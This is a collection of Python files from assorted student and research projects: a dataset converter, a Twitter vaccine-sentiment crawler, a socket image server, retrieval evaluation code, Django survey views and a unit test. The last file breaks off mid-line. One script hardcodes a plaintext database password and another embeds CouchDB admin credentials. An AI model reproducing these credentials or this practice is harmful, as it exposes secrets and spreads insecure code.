parser.add_argument('--addtitle', type='bool', default=True,\n                        help='add title to question string')\n    parser.add_argument('--split_dev', type=float, default=0.85,\n                        help='start point of dev data')\n    parser.add_argument('--split_test', type=float, default=0.90,\n                        help='start point of test data')\n\n    args = parser.parse_args()\n\n    if not args.category:\n        p = Path(args.input.split(',')[0])  # derive the category from the first input file name\n        args.category = p.stem.replace('_dist_2018','')\n\n    squad_data_all = []\n    squad_json_train = []\n    squad_json_dev = []\n    squad_json_test = []\n    for inputfile in args.input.split(','):\n        with open(inputfile) as f:\n            shinra_dataset = json.load(f)\n        filedir=Path(args.html_dir).joinpath(args.category)\n        squad_data = process(shinra_dataset, filedir, multiple_answer=args.multiple_answer, addtitle=args.addtitle)\n\n        squad_data_all.extend(squad_data)\n        split_dataset = util.make_split_data(squad_data, split_nums=[args.split_dev, args.split_test])\n        
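# --- Aside (illustrative sketch, not part of this dataset record): replace_html_tag above
# --- overwrites markup with spaces rather than deleting it, so every character keeps its index
# --- and the answer_start/answer_end offsets in Attributes_html stay valid in the cleaned context.
# --- A self-contained illustration of that offset-preserving blanking:
import re
line = list('<b>Tokyo</b> is a city')
for m in re.finditer(r'<[^>]+?>', ''.join(line)):
    line[m.start():m.end()] = [' '] * (m.end() - m.start())  # equal-length replacement
assert ''.join(line) == '   Tokyo     is a city'  # same length, offsets unchanged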
squad_json_train.extend(split_dataset[0])\n squad_json_dev.extend(split_dataset[1])\n squad_json_test.extend(split_dataset[2])\n\n with open(args.output, 'w') as f:\n f.write(json.dumps({\"data\": squad_data_all}, sort_keys=True, ensure_ascii=False)) #for formal run\n\n with open(args.output.replace('.json', '-train.json'), 'w') as f:\n f.write(json.dumps({\"data\": squad_json_train}, sort_keys=True, ensure_ascii=False))\n\n with open(args.output.replace('.json', '-dev.json'), 'w') as f:\n f.write(json.dumps({\"data\": squad_json_dev}, sort_keys=True, ensure_ascii=False))\n\n with open(args.output.replace('.json', '-test.json'), 'w') as f:\n f.write(json.dumps({\"data\": squad_json_test}, sort_keys=True, ensure_ascii=False))\n\nmain()\n","sub_path":"scripts/shinra/shinra_to_squad.py","file_name":"shinra_to_squad.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"614250432","text":"\"\"\"\nCOMP90024 2021 S1 Assignment 2\nTeam: 41\nCity: Melbourne\nGroup Member:\nHuimin Huang 1142020\nHan Sun 1111271\nJean Ma 1028582\nShirui Cheng 1189721\nXiaoyue Lyu 1237539\n\"\"\"\nfrom tweepy import OAuthHandler, Stream, StreamListener\nimport twitterCredential, time, json, couchdb\nfrom urllib3.exceptions import ProtocolError\nfrom http.client import IncompleteRead as http_incompleteRead\nfrom urllib3.exceptions import IncompleteRead as urllib3_incompleteRead\n\nmonth_list = [\"\",\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"]\ncity_list = [\"Melbourne\", \"Brisbane\", \"Sydney\", \"Adelaide\", \"Canberra\", \"Perth (WA)\", \"Hobart\", \"Queensland\"]\n\ndef read_score():\n with open(\"AFINN.txt\") as f:\n lines = f.readlines()\n afinn = {}\n for line in lines:\n line = line.strip().lower()\n line_len = len(line)\n try:\n score = int(line[line_len - 2: line_len].lstrip())\n word = line[0:line_len - 2].rstrip()\n afinn[word] = score*abs(score)\n except ValueError:\n print(\"invalid score\")\n f.close()\n return afinn\n\nafinn = read_score()\n\ndef processData(data):\n data = json.loads(data)\n data_dict = {\"id\": data[\"id\"]}\n\n date = data[\"created_at\"].split()\n m = month_list.index(date[1])\n month = \"0\" + str(m) if m < 10 else str(m)\n d = int(date[2])\n day = \"0\" + str(d) if d < 10 else str(d)\n year = date[-1]\n timestamp = year + \"/\" + month + \"/\" + day\n data_dict[\"created_at\"] = timestamp\n\n if data[\"place\"] is not None:\n try:\n city = data[\"place\"][\"name\"]\n if city in city_list:\n data_dict[\"metropolitan\"] = True\n else:\n data_dict[\"metropolitan\"] = False\n data_dict[\"city\"] = city\n except KeyError:\n data_dict[\"city\"] = None\n try:\n coordinates = data[\"place\"][\"bounding_box\"][\"coordinates\"][0]\n data_dict[\"coordinates\"] = [(coordinates[0][0] + coordinates[1][0]) / 2.0,\n (coordinates[0][1] + coordinates[2][1]) / 2.0]\n except KeyError:\n data_dict[\"coordinates\"] = None\n\n \"\"\"clean data to calculate sentiment score\"\"\"\n rawText = data[\"text\"]\n data_dict[\"text\"] = rawText\n # data_dict[\"text\"] = re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \"\", rawText)\n # print(data_dict[\"text\"])\n twitter_text = data_dict[\"text\"].lower()\n replaced_twitter_text = twitter_text.replace('!', ' ').replace(',', ' ') \\\n .replace('?', ' ').replace('.', ' ').replace('\\\\\\'', ' ').replace('\\\\\\\"', ' ') \\\n .replace('\\'', ' ').replace('\\\"', ' ').replace('\\\\n', ' ')\n\n 
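# --- Aside (illustrative sketch, not part of this dataset record): the sentiment score that
# --- processData computes next is a plain AFINN lookup; read_score() stores score*abs(score)
# --- per word so strong words dominate, and unknown words contribute 0 via dict.get.
# --- Minimal self-contained version with made-up scores:
def afinn_score(text, afinn):
    for ch in '!,?.\'"':
        text = text.replace(ch, ' ')  # similar punctuation stripping to processData above
    return sum(afinn.get(word, 0) for word in text.lower().split())

assert afinn_score("Good vaccine, bad rollout!", {'good': 9, 'bad': -9}) == 0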
split_words = replaced_twitter_text.split()\n totalScore = 0\n for word in split_words:\n score = afinn.get(word, 0)\n totalScore += score\n data_dict[\"sentiment_score\"] = totalScore\n\n vaccine_list = [[\"astrazeneca\", \"oxford\"], [\"biontech\", \"fosun\", \"pfizer\"], [\"moderna\"], [\"johnson\"],\n [\"chinese\", \"sinovac\"], [\"sputnik\"]]\n brand = \"\"\n for type in vaccine_list:\n for vac in type:\n if vac in twitter_text:\n brand = vac\n break\n if brand != \"\":\n break\n\n data_dict[\"vaccine_brand\"] = brand\n return data_dict\n\nclass StdOutListener(StreamListener):\n \"\"\" A listener handles tweets that are received from the stream.\n This is a basic listener that just prints received tweets to stdout.\n \"\"\"\n\n def on_data(self, data):\n try:\n processedData = processData(data)\n if processedData[\"vaccine_brand\"] != \"\":\n print(\"get one tweet\")\n couch = couchdb.Server(\"http://admin:couchdb@localhost:5984\")\n db = couch['brand']\n if str(processedData[\"id\"]) not in db:\n \tdb[str(processedData[\"id\"])] = processedData\n\n except http_incompleteRead as e:\n print(\"http incompleteRead error: %s\" % str(e))\n print(\"Restart in 10 seconds\")\n time.sleep(10)\n return True\n except urllib3_incompleteRead as e:\n print(\"urllib3 IncompleteRead error: %s\" % str(e))\n print(\"Restart in 10 seconds\")\n time.sleep(10)\n return True\n except BaseException as e:\n print(\"Error: %s\" % str(e))\n print(\"Restart in 10 seconds\")\n time.sleep(10)\n return True\n return True\n\n def on_error(self, status):\n if status == 420:\n # return false in on_data disconnects the stream\n return False\n print(status)\n\n\n\nif __name__ == '__main__':\n listener = StdOutListener()\n auth = OAuthHandler(twitterCredential.consumer_key, twitterCredential.consumer_secret)\n auth.set_access_token(twitterCredential.access_token, twitterCredential.access_token_secret)\n\n stream = Stream(auth, listener)\n\n # filter stream data by the keywords:\n while True:\n try:\n #stream api filter not allow to filter by location and keyword at the same time\n stream.filter(locations=[113.338953078, -43.6345972634, 153.569469029, -10.6681857235])\n except (ProtocolError, AttributeError):\n continue\n\n","sub_path":"Harvester/StreamCrawler_b.py","file_name":"StreamCrawler_b.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"528553858","text":"import logging\nimport os\nimport socket\nimport struct\n\nimport cv2\n\n_ip = 'localhost'\n_port = 7007\n\n_image_paths = [\n 'data/android.jpg',\n 'data/android_flip.jpg',\n]\n\n_logger = logging.getLogger(__name__)\n\n\nclass ImageServer:\n\n def __init__(self):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:\n _logger.debug('Server socket created')\n\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind((_ip, _port))\n server_socket.listen(1)\n\n image_index = 0\n\n while True:\n _logger.debug('Server socket waiting for incoming connections')\n\n client_socket, from_address = server_socket.accept()\n with client_socket:\n _logger.debug('Connection established with {}'.format(from_address))\n\n image_path = os.path.join(os.getcwd(), _image_paths[image_index])\n img = cv2.imread(image_path, cv2.IMREAD_COLOR)\n\n # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # img = cv2.resize(img, dsize=(10, 10))\n _ret, img = cv2.imencode('.jpg', img)\n\n img_bytes = img.tobytes()\n data = struct.pack('>I', 
len(img_bytes)) + img_bytes\n\n try:\n client_socket.sendall(data)\n _logger.debug('Sent {} bytes to {}'.format(len(data), from_address))\n except ConnectionResetError as conn_reset_err:\n _logger.exception(conn_reset_err)\n\n _logger.debug('Closing connection with {}'.format(from_address))\n\n image_index = (image_index + 1) % len(_image_paths)\n\n # _logger.debug('Closing server socket')\n\n # print('Bye!')\n\n\ndef main():\n ImageServer()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n main()\n","sub_path":"test/image_server.py","file_name":"image_server.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198632932","text":"import GeneralLib as GL\nimport os\nfrom pip._vendor.distlib.compat import raw_input\n\nclass Evaluate:\n \n def __init__(self, qresultsPath):\n #Folder where results are stored\n self._qrPath = qresultsPath\n #Json file where relevance info is stored \n self._relInfo = GL.jsonToDict(raw_input(\"Enter json file where relevance info is stored:\"))\n #Precision table\n self._precTable = dict()\n #Recall Table\n self._recallTable = dict()\n #Table having average precisions for each query \n self._avgPrecisions = list()\n #Table having the reciprocal rank if first relevant document retrieved.\n self._fRecRank = list()\n self._MAP = 0\n self._MRR = 0\n self._Pat5 = 0\n self._Pat20 = 0\n \n #Evaluate results of a query \n def performEval(self):\n resultsFile = GL.getDataFiles(self._qrPath)\n evalFilesPath = raw_input(\"Enter folder where all evaluation results will be stored:\")\n if not os.path.exists(evalFilesPath):\n os.mkdir(evalFilesPath)\n \n #For each query, get the results\n for file in resultsFile:\n qID = GL.getQID(file)\n\n #If query not in relvance info, discard the query\n if not qID in self._relInfo.keys():\n continue\n filename = GL.getFilename(self._qrPath, file)\n results = GL.getResults(filename)\n folderName = evalFilesPath + \"Eval_Query\" + str(qID) +\"/\"\n \n \n #Calculate precision and store precision table \n self._precTable = self.calcPrecision(results, qID)\n data = \"\"\n if (len(self._precTable.keys()) > 1):\n if not os.path.exists(folderName):\n os.mkdir(folderName)\n for entry in self._precTable.keys():\n data += entry + \"\\t\" + str(self._precTable[entry]) + \"\\n\" \n with open(GL.getFilename(folderName, \"PrecisonTable.txt\"), 'w') as f:\n f.write(data)\n \n #Calculate P@5 and P@20 \n self._Pat5 = self.calcPatK(5)\n self._Pat20 = self.calcPatK(20)\n data = \"\\nPrecision @ 5 :\" + str(self._Pat5)\n data += \"\\nPrecision @ 20 :\" + str(self._Pat20)\n with open(GL.getFilename(folderName, \"Precision@K.txt\"), 'w') as f:\n f.write(data)\n \n #Calulate average precisions\n self._avgPrecisions.append(self.calcAvgPrecision(qID, results))\n \n #Calculate precision and store precision table \n self._recallTable = self.calcRecall(results, qID)\n data = \"\"\n if (len(self._recallTable.keys()) > 1):\n if not os.path.exists(folderName):\n os.mkdir(folderName)\n for entry in self._recallTable.keys():\n data += entry + \"\\t\" + str(self._recallTable[entry]) + \"\\n\" \n with open(GL.getFilename(folderName, \"RecallTable.txt\"), 'w') as f:\n f.write(data)\n \n print(\"Done with evaluating Query\" + str(qID) + \".\")\n \n self._MAP = self.calcMAP()\n print(self._MAP)\n self._MRR = self.calcMRR()\n data = \"Mean Average Precision : \" + str(self._MAP)\n data += \"\\nMean Reciprocal Rank : \" + str(self._MRR)\n \n with 
open(GL.getFilename(evalFilesPath, \"MAP_MRR.txt\"), 'w') as f:\n f.write(data)\n print(\"Done with evaluation.\") \n \n #Function to calculate precision\n def calcPrecision(self, results, qID):\n pTable = dict()\n N = 0\n D = 0\n \n for rank in results.keys():\n if (results[rank] in self._relInfo[qID]):\n N+=1\n if(N==1):\n self._fRecRank.append(1 / rank)\n D+=1\n pTable.update({results[rank] : (N / D)})\n return pTable\n \n #Function to calculate recall\n def calcRecall(self, results, qID):\n rTable = dict()\n N = 0\n D = len(self._relInfo[qID])\n \n for rank in results.keys():\n if (results[rank] in self._relInfo[qID]):\n N+=1\n rTable.update({results[rank] : (N / D)})\n return rTable\n\n \n #Function to calculate Average precision\n def calcAvgPrecision(self, qID, results):\n totalPrecision = 0\n for entry in self._relInfo[qID]:\n if entry in results.values():\n totalPrecision += self._precTable[entry]\n \n return (totalPrecision / len(self._relInfo[qID]))\n \n \n #Function to calculate MAP\n def calcMAP(self):\n totalPrecision = 0\n for prec in self._avgPrecisions:\n totalPrecision += prec\n\n return (totalPrecision / len(self._avgPrecisions))\n \n \n #Function to calculate MRR\n def calcMRR(self):\n totalRecRank = 0\n for rrank in self._fRecRank:\n totalRecRank += rrank\n \n return (totalRecRank / len(self._fRecRank))\n \n \n #Function to calculate precision at K\n def calcPatK(self, K):\n rank = 1\n for doc in self._precTable.keys():\n if rank==K:\n return self._precTable[doc]\n rank+=1\n \n return 0\n \nif __name__ == \"__main__\" :\n \n resultsFolder = raw_input(\"Enter folder where search results are stored:\")\n evaluate = Evaluate(resultsFolder)\n evaluate.performEval()","sub_path":"Phase2/src/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430587583","text":"import pymorphy2\nimport numpy as np\nimport pymssql\nimport re\nimport scipy\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, roc_auc_score\nfrom sklearn.decomposition import PCA\n\ndata = []\n\ndef f_tokenizer(s):\n morph = pymorphy2.MorphAnalyzer()\n if type(s) == unicode:\n t = s.split(' ')\n else:\n t = s\n for j in t:\n m = morph.parse(j.replace('.',''))\n if not len(m) == 0:\n wrd = m[0]\n if wrd.tag.POS not in ('NUMR','PREP','CONJ','PRCL','INTJ'):\n data.append(wrd.normal_form)\n return data\n\nconn = pymssql.connect(server='RIY-PC\\SQLRIY', user='EPLANASU\\RIY', password='Butcherryb76593', database='Price_python')\n\ncursor = conn.cursor(as_dict=True)\n\ncursor.execute(\"SELECT TOP 500 name FROM dbo.Price_list\")\n\nfor row in cursor:\n row = str(row['name']).lower()\n row = re.sub(r'устр(-во|\\.)','устройство', row)\n row = re.sub(r'авт(омат\\.|ом\\.|\\.)','автоматического', row)\n row = re.sub(r'рег(ул\\.|улир\\.|\\-я)','регулирования', row)\n row = row.replace('ас.','асинхронный ')\n row = row.replace('пост.тока','постоянного тока')\n row = row.replace('перем.тока','переменного тока')\n row = row.replace('прям.вкл.','прямого включения')\n row = row.replace('модул.','модульный')\n row = row.replace('тороид.','торроидный ')\n row = row.lstrip()\n row = row.rstrip()\n print(row)\n coder = HashingVectorizer(tokenizer=f_tokenizer, encoding='KOI8-R', 
n_features=256)\nconn.commit()\n\nprint(data)","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"104520088","text":"from django.shortcuts import render\nfrom pymongo import MongoClient\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.http.request import QueryDict\nimport json\nimport os\nimport pandas as pd\nfrom django.conf import settings\nimport pdb\n\ndef choice_without_id(request):\n\n request.GET = request.GET.copy()\n request.GET.update({'user_id': 1234, 'name': 'Max', 'intervention': 1})\n return choice(request, alert=\"\"\"alert(\\\"You shouldn\\'t be here.\\\")\"\"\")\n\ndef choice(request, alert=\"\"):\n # return render(request, 'saving_app/voya-choices.html', {'user_id': user_id})\n try:\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n intervention = int(request.GET.get(\"intervention\"))\n except:\n return HttpResponseNotFound(\"
    Please specify correct parameters. These are user_id, name and intervention.
    \")\n if (intervention == 1):\n chooseText = (\"I want to enroll with other choices.\", \"Note: This enrollment will cancel your scheduled automatic enrollment.\")\n defaultText = (\"Let my scheduled automatic enrollment go through.\", \"\")\n optoutText = (\"I do not wish to enroll.\", \"\")\n elif (intervention == 2):\n chooseText = (\"Do it Myself\", \"I want to enroll with other choices\")\n defaultText = (\"Do it for Me\", \"Let my scheduled auto-enrollment go through\")\n optoutText = (\"I Don't Want to Save\", \"I want to cancel my auto-enrollment\")\n elif (intervention >= 3 and intervention <= 17):\n chooseText = (\"I want to enroll at a different rate.\", \"I want to personalize my enrollment by selecting a different savings rate.\")\n defaultText = (\"I want to confirm my automatic enrollment.\", \"I want my auto-enrollment to go through at the savings rate chosen by my employer.\")\n optoutText = (\"I do not want to enroll.\", \"I want to cancel my auto-enrollment and not save at this time.\")\n else:\n return HttpResponseNotFound(\"
    Currently only interventions 1 to 17 are supported.
    \")\n\n # Extra text\n if (intervention >= 14):\n extraText = \"\"\n else:\n extraText = \"hidden\"\n\n # Orientation\n if (intervention in [9, 10]):\n grid = \"col-sm-4 col-sm-offset-4 top-buffer\"\n zeroMargin = \"margin-top:0; margin-bottom: 4px; min-height: 0; padding-top: 0; padding-bottom: 0;\"\n realZeroMargin = \"margin-top:0; margin-bottom: 0; min-height: 0; padding-top: 0; padding-bottom: 0;\"\n zeroMinheight = \"min-height: 0;\"\n else:\n grid = \"col-sm-4\"\n zeroMargin = \"\"\n realZeroMargin = \"\"\n zeroMinheight = \"\"\n\n chooseAttr = \"id=others\"\n defaultAttr = \"\"\"id=\"auto\" onclick=\"$('#myModal2').modal({backdrop:'static'}, 'toggle');\" \"\"\"\n optoutAttr = \"\"\"id=\"no\" onclick=\"$('#myModal').modal({backdrop:'static'}, 'toggle');\" \"\"\"\n optionsAttr = [None]*3\n optionsText = [None]*3\n # Option position and text\n if (intervention in [1,2,3,10,11,12,13,14,15,16,17]):\n optionsAttr = [chooseAttr, defaultAttr, optoutAttr]\n optionsText = [chooseText, defaultText, optoutText]\n elif (intervention in [4, 9]):\n optionsAttr = [defaultAttr, chooseAttr, optoutAttr]\n optionsText = [defaultText, chooseText, optoutText]\n elif (intervention in [5]):\n optionsAttr = [defaultAttr, optoutAttr, chooseAttr]\n optionsText = [defaultText, optoutText, chooseText]\n elif (intervention in [6]):\n optionsAttr = [chooseAttr, optoutAttr, defaultAttr]\n optionsText = [chooseText, optoutText, defaultText]\n elif (intervention in [7]):\n optionsAttr = [optoutAttr, chooseAttr, defaultAttr]\n optionsText = [optoutText, chooseText, defaultText]\n elif (intervention in [8]):\n optionsAttr = [optoutAttr, defaultAttr, chooseAttr]\n optionsText = [optoutText, defaultText, chooseText]\n\n # Option colors\n color = [\"\"]*3\n if (intervention in [11, 15]):\n color = [\"\", \"\", \"red\"]\n elif (intervention in [12, 16]):\n color = [\"green\", \"yellow\", \"red\"]\n elif (intervention in [13, 17]):\n color = [\"yellow\", \"green\", \"red\"]\n\n return render(request, 'saving_app/voya-choices.html',\n {\"user_id\": user_id, \"name\": name, \"optionsText\": optionsText,\n \"intervention\": intervention, \"extraText\": extraText,\n \"grid\": grid, \"optionsAttr\": optionsAttr, \"color\": color, \"alert\": alert,\n \"zeroMargin\": zeroMargin, \"zeroMinheight\": zeroMinheight,\n \"realZeroMargin\" :realZeroMargin})\n\ndef set1(request):\n # return render(request, 'saving_app/voya-choices.html', {'user_id': user_id})\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n intervention = int(request.GET.get(\"intervention\"))\n return render(request, 'saving_app/voya-set1.html',\n {\"user_id\": user_id, \"name\": name, \"intervention\": intervention})\n\ndef set2(request):\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n contri = request.GET.get(\"contri\")\n age = request.GET.get(\"age\")\n salary = request.GET.get(\"salary\")\n savings = request.GET.get(\"savings\")\n intervention = int(request.GET.get(\"intervention\"))\n if (contri == None):\n contri = -1\n return render(request, 'saving_app/voya-set2.html',\n {\"user_id\": user_id, \"name\": name, \"contri\": contri,\n \"age\": age, \"salary\": salary, \"savings\": savings, \"intervention\": intervention})\n\ndef lookup(request):\n age = int(request.GET.get(\"age\"))\n salary = int(request.GET.get(\"salary\"))\n savings = int(request.GET.get(\"savings\"))\n csv_file = os.path.join(settings.BASE_DIR, \"saving_app/lookup.csv\")\n lk = pd.read_csv(csv_file)\n # The largest element which is 
smaller than the query\n uni_ages = lk.Age.unique()\n age_thre = uni_ages[age >= uni_ages]\n if (len(age_thre) == 0):\n uni_ages.sort()\n age_thre = uni_ages[0]\n else:\n age_thre.sort()\n age_thre = age_thre[-1]\n # The largest element which is smaller than the query\n uni_salaries = lk.Salary.unique()\n salary_thre = uni_salaries[salary >= uni_salaries]\n if (len(salary_thre) == 0):\n uni_salaries.sort()\n salary_thre = uni_salaries[0]\n else:\n salary_thre.sort()\n salary_thre = salary_thre[-1]\n # The largest element which is smaller than the query\n uni_savings = lk.Savings.unique()\n savings_thre = uni_savings[savings >= uni_savings]\n if (len(savings_thre) == 0):\n uni_savings.sort()\n savings_thre = uni_savings[0]\n else:\n savings_thre.sort()\n savings_thre = savings_thre[-1]\n small_lk = lk[(lk['Age'] == age_thre) & (lk['Salary'] == salary_thre) & (lk['Savings'] == savings_thre)]\n lk_dict = {}\n for row in small_lk.iterrows():\n lk_dict[row[1]['Rate']] = {}\n lk_dict[row[1]['Rate']]['target'] = row[1]['Target']\n lk_dict[row[1]['Rate']]['need'] = row[1]['Need']\n lk_dict[row[1]['Rate']]['gap'] = row[1]['Gap']\n\n data = json.dumps(lk_dict)\n return HttpResponse(data, content_type='application/json')\n\n\n\n\ndef set3(request):\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n contri = request.GET.get(\"contri\")\n age = request.GET.get(\"age\")\n salary = request.GET.get(\"salary\")\n savings = request.GET.get(\"savings\")\n intervention = int(request.GET.get(\"intervention\"))\n return render(request, 'saving_app/voya-set3.html',\n {\"user_id\": user_id, \"name\": name, \"contri\": contri,\n \"age\": age, \"salary\": salary, \"savings\": savings, \"intervention\": intervention})\n\ndef update(request):\n user_id = request.GET.get(\"user_id\")\n name = request.GET.get(\"name\")\n client = MongoClient()\n\n client = MongoClient(os.environ['MONGOLAB_OLIVE_URI'])\n\n db = client.get_default_database()\n cursor = db.user_data.find_one({\"user_id\": user_id})\n if (cursor == None):\n db.user_data.insert_one({\n \"name\": name,\n \"user_id\": user_id,\n \"choice_time\": 0,\n \"set1_time\": 0,\n \"set2_time\": 0,\n \"set3_time\": 0,\n \"clicks\": []\n })\n\n clicks = request.GET.get(\"clicks\")\n if (clicks != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$push\": {\n \"clicks\": clicks\n }\n }\n )\n\n choice_time = request.GET.get(\"choice_time\")\n if (choice_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"choice_time\": float(choice_time)\n }\n }\n )\n\n set1_time = request.GET.get(\"set1_time\")\n if (set1_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"set1_time\": float(set1_time)\n }\n }\n )\n\n set2_time = request.GET.get(\"set2_time\")\n if (set2_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"set2_time\": float(set2_time)\n }\n }\n )\n\n set3_time = request.GET.get(\"set3_time\")\n if (set3_time != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$inc\": {\n \"set3_time\": float(set3_time)\n }\n }\n )\n\n rate = request.GET.get(\"rate\")\n if (rate != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$set\": {\n \"rate\": int(float(rate))\n }\n }\n )\n\n final_choice = request.GET.get(\"final_choice\")\n if (final_choice != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$set\": {\n \"final_choice\": final_choice\n }\n }\n )\n\n intervention = 
request.GET.get(\"intervention\")\n if (intervention != None):\n db.user_data.update_one(\n {\"user_id\": user_id}, {\n \"$set\": {\n \"intervention\": intervention\n }\n }\n )\n\n client.close()\n\n return HttpResponse('')\n","sub_path":"saving_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220228469","text":"import unittest\nimport sys\nimport datetime\n\nsys.path.append('../')\n\nfrom etl.Loaders.DedupeOnlyLoader import DedupeOnlyLoader\nfrom tests.utils.TestDBInterface import get_test_interface\n\n\nclass TestDedupeOnlyLoader(unittest.TestCase):\n\n def setUp(self):\n self.TEST_TABLE = 'test_table'\n self.SEED_TEST_DATA = [{'ID': 1, 'first_name': 'Henry', 'last_name': 'Jones', 'school_year': 'Sophomore',\n 'updated_at': datetime.datetime(2017, 3, 12, 15, 45, 0)},\n {'ID': 2, 'first_name': 'Hiroshi', 'last_name': 'Tanaka', 'school_year': 'Senior',\n 'updated_at': datetime.datetime(2017, 6, 15, 8, 15, 32)},\n {'ID': 3, 'first_name': 'Ifemelu', 'last_name': 'Ngozi', 'school_year': 'Senior',\n 'updated_at': datetime.datetime(2017, 4, 25, 19, 11, 14)},\n {'ID': 4, 'first_name': 'Jimmy', 'last_name': 'Hoffa', 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 1, 22, 11, 45, 12)}]\n\n self.TEST_MATCH_FILEDS = ['first_name', 'updated_at']\n\n self.NO_DUP_FIELDS = {'first_name': 'Hiram', 'last_name': 'Jallop', 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 4, 1, 12, 0, 25)}\n self.SAME_FIRST_NAME = {'first_name': 'Hiroshi', 'last_name': 'Ieyasu', 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 4, 10, 18, 4, 4)}\n self.SAME_FIRST_NAME_AND_UPDATED_AT = {'first_name': 'Ifemelu', 'last_name': 'Adebayo',\n 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 4, 25, 19, 11, 14)}\n\n self.db = get_test_interface()\n self.loader = DedupeOnlyLoader(self.TEST_TABLE, self.TEST_MATCH_FILEDS, self.db)\n\n with self.db as db:\n db.delete(self.TEST_TABLE)\n for row in self.SEED_TEST_DATA:\n db.insert(self.TEST_TABLE, row)\n\n def clean_up():\n with self.db as db:\n db.delete(self.TEST_TABLE)\n\n self.addCleanup(clean_up)\n\n def test_loads_row_with_no_duplicates(self):\n self.loader.load([self.NO_DUP_FIELDS])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected_new_row = dict(self.NO_DUP_FIELDS)\n expected_new_row['ID'] = 5\n expected = list(self.SEED_TEST_DATA) + [expected_new_row]\n\n self.assertEqual(expected, actual)\n\n def test_loads_row_with_some_duplicates(self):\n self.loader.load([self.SAME_FIRST_NAME])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected_new_row = dict(self.SAME_FIRST_NAME)\n expected_new_row['ID'] = 5\n expected = list(self.SEED_TEST_DATA) + [expected_new_row]\n\n self.assertEqual(expected, actual)\n\n def test_skips_row_with_all_duplicates(self):\n self.loader.load([self.SAME_FIRST_NAME_AND_UPDATED_AT])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected = list(self.SEED_TEST_DATA)\n\n self.assertEqual(expected, actual)\n\n def test_handles_multiple_rows_correctly(self):\n self.loader.load([self.SAME_FIRST_NAME, self.NO_DUP_FIELDS, self.SAME_FIRST_NAME_AND_UPDATED_AT])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected_new_row1 = dict(self.SAME_FIRST_NAME)\n expected_new_row1['ID'] = 5\n expected_new_row2 = dict(self.NO_DUP_FIELDS)\n expected_new_row2['ID'] = 6\n expected 
= list(self.SEED_TEST_DATA) + [expected_new_row1, expected_new_row2]\n\n self.assertEqual(expected, actual)\n","sub_path":"tests/etl_tests/loader_tests/test_DedupeOnlyLoader.py","file_name":"test_DedupeOnlyLoader.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"202722026","text":"import pandas as pd\nimport shutil\nimport random\nimport os\n\nsrc_path = '/home/utopia/CVDATA/lumbar/0613/lumbar_train51/class/1/' # 多标签\ntarget_path = '/home/utopia/xuleichao/projects/tianchi-SparkAI/keypoint/multi-label-image-classification/MSCOCO'\n\nall_images = os.listdir(src_path)\n\ntrain_dir = 'train2014'\ntrain_image_info = 'trainAnnotation.csv'\n\ntest_dir = 'val2014'\ntest_image_info = 'testAnnotation.csv'\n\ndef label_hit(string, dct):\n if '-' not in string:\n dct[string.upper()] = '1'\n else:\n string_lst = string.split('-')\n for j in string_lst:\n dct[j.upper()] = '1'\n\n return dct\n\nif os.path.exists(target_path + '/train2014'):\n shutil.rmtree(target_path + '/train2014')\n os.mkdir(target_path + '/train2014')\nelse:\n os.mkdir(target_path + '/train2014')\n\ncsv_result_train = []\ncsv_result_test = []\nfor i in all_images:\n if os.path.getsize(src_path + i):\n class_dct = {'images_name': i, 'V1': '0', 'V2': '0', 'V3': '0', 'V4': '0', 'V5': '0'}\n info = i.split('_')\n label_dct = label_hit(info[1], class_dct)\n if 